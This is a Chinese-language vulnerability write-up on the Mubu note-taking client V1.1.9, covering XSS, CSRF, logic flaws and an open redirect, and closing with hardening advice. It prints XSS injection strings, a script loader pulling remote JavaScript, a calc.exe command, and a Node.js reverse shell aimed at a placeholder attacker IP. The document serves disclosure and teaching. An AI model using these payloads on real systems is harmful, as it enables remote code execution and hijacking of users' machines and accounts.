幕布管理工具V1.1.9漏洞分析与利用教学文档<\/h3>

0x00 前言<\/strong><\/h4>
幕布是一款多平台同步的头脑管理工具，支持笔记整理、任务管理及思维导图生成。本文基于V1.1.9版本，分析其安全漏洞及利用链，涵盖XSS、CSRF、RCE等漏洞的复现与利用方法。<\/p>

0x01 背景<\/strong><\/h4>

功能特性<\/strong>：免费版支持多端同步、多种格式导出、脑图演示。<\/li>
技术栈<\/strong>：基于Electron开发，导致XSS可能升级为RCE（远程代码执行）。<\/li> <\/ul>

0x02 历史漏洞（V1.1.0）<\/strong><\/h4>

CSRF漏洞<\/strong>：

保存文档、创建文件夹等操作未校验Token，可构造恶意页面诱导用户触发。<\/li> <\/ul> <\/li>
XSS漏洞<\/strong>：

反射型XSS<\/strong>：搜索框未过滤用户输入，直接输出到页面。<\/li>
存储型XSS<\/strong>：文件夹名、文档名（脑图模式触发）、昵称字段未过滤，可植入恶意脚本。<\/li> <\/ul> <\/li> <\/ol>

0x03 当前漏洞（V1.1.9）<\/strong><\/h4>

残留漏洞<\/strong>：<\/p>

搜索框XSS<\/strong>：仍可触发弹窗（如<script>alert(1)<\/script><\/code>）。<\/li>
文件夹名XSS<\/strong>：点击文件夹时触发存储型XSS。<\/li>
文档ID注入<\/strong>：请求参数id<\/code>未过滤，可闭合HTML属性注入事件（如" onmouseover="alert(1)<\/code>）。<\/li> 利用链<\/strong>： " onmouseover="s=createElement('script');body.appendChild(s);s.src='https:\/\/恶意JS链接'" <\/span><\/span><\/code><\/pre><\/li> 隐蔽性<\/strong>：通过onmouseover<\/code>事件触发，页面显示正常。<\/li> <\/ul> <\/li> <\/ul> <\/li> RCE升级<\/strong>：<\/p> Electron漏洞<\/strong>：XSS可调用Node.js的child_process<\/code>模块执行系统命令。 Windows弹计算器<\/strong>： require<\/span>('child_process'<\/span>).exec<\/span>('calc.exe'<\/span>) <\/span><\/span><\/code><\/pre><\/li> Mac反弹Shell<\/strong>： var<\/span> net<\/span> =<\/span> require<\/span>("net"<\/span>), sh<\/span> =<\/span> require<\/span>("child_process"<\/span>).exec<\/span>("\/bin\/bash"<\/span>); <\/span><\/span>var<\/span> client<\/span> =<\/span> new<\/span> net<\/span>.Socket<\/span>(); <\/span><\/span>client<\/span>.connect<\/span>(端口<\/span>, "攻击者IP"<\/span>, function<\/span>(){client<\/span>.pipe<\/span>(sh<\/span>.stdin<\/span>);sh<\/span>.stdout<\/span>.pipe<\/span>(client<\/span>);}); <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ul> <\/li> 利用场景<\/strong>：<\/p> 被动触发<\/strong>：用户保存恶意文档后，客户端查看时触发RCE。<\/li> 主动攻击<\/strong>：诱导用户登录并访问恶意分享链接，利用XSS创建文档。<\/li> <\/ul> <\/li> <\/ol> 0x04 其他漏洞<\/strong><\/h4> 逻辑缺陷<\/strong>：<\/p> 手机号绑定绕过<\/strong>：绑定新手机号无需原手机号验证码，仅需新手机号验证码（可CSRF利用）。<\/li> <\/ul> <\/li> 微信解绑绕过<\/strong>：直接发送解绑请求包（无二次验证），存在CSRF风险。<\/li> <\/ul> <\/li> <\/ul> <\/li> 任意URL跳转<\/strong>：<\/p> 客户端跳转参数next<\/code>未校验，可构造恶意链接（如https:\/\/mubu.com\/client_redirect?next=http:\/\/钓鱼网站<\/code>）。<\/li> <\/ul> <\/li> CSRF全局问题<\/strong>：<\/p> 所有POST操作可转为GET<\/strong>（如修改昵称、创建文档、绑定手机号）。<\/li> 示例（修改昵称）<\/strong>： GET<\/span> \/api\/set_nickname?nickname=恶意昵称 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 0x05 防御建议<\/strong><\/h4> 输入过滤<\/strong>：对id<\/code>、文件夹名、搜索框等参数严格过滤HTML特殊字符。<\/li> <\/ul> <\/li> CSRF防护<\/strong>：关键操作添加Token校验，禁用GET请求修改数据。<\/li> <\/ul> <\/li> Electron加固<\/strong>：禁用Node.js集成（nodeIntegration: false<\/code>）或启用上下文隔离。<\/li> <\/ul> <\/li> 逻辑校验<\/strong>：敏感操作（如解绑、换绑手机号）需二次验证。<\/li> <\/ul> <\/li> <\/ol> 附录：漏洞复现步骤<\/strong><\/h4> XSS验证<\/strong>：创建文件夹，名称填入``，点击触发。<\/li> <\/ul> <\/li> RCE利用<\/strong>：在文档ID注入恶意脚本，诱导用户客户端打开文档触发计算器。<\/li> <\/ul> <\/li> <\/ol> 注<\/strong>：以上漏洞已提交官方修复，严禁用于非法用途。教学仅限安全研究。<\/p>